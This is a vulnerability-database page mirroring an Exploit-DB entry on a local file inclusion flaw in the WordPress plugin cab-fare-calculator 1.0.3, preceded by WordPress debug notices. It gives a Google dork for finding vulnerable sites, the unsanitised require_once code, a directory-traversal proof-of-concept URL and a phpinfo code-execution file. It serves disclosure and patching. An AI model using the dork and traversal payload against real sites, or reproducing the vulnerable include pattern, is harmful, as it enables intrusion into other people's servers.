Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion - exploit.company
header-logo
Suggest Exploit
vendor:
cab-fare-calculator
by:
Hassan Khan Yusufzai - Splint3r7
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: cab-fare-calculator
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE:
CPE: a:wordpress:wordpress_plugin:cab-fare-calculator
Metasploit:
Other Scripts:
Platforms Tested: Firefox
2022

WordPress Plugin cab-fare-calculator 1.0.3 – Local File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'controller' parameter of the 'tblight.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system.

Mitigation:

The vendor recommends to update the plugin to the latest version. Additionally, the user should ensure that all input is properly sanitized before being used.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php

# Impact:

Local File Read / Code Execution

# Vulnerable Code:

```
if(!empty($_GET['controller']) && !empty($_GET['action']) &&
!empty($_GET['ajax']) && $_GET['ajax'] == 1)
{
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```

# Proof of concept:

http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:

/etc/index.php:

<?php echo "Local file read"; phpinfo(); ?>

Navigation

Suggest Exploit

Services By CQR

cqrsecured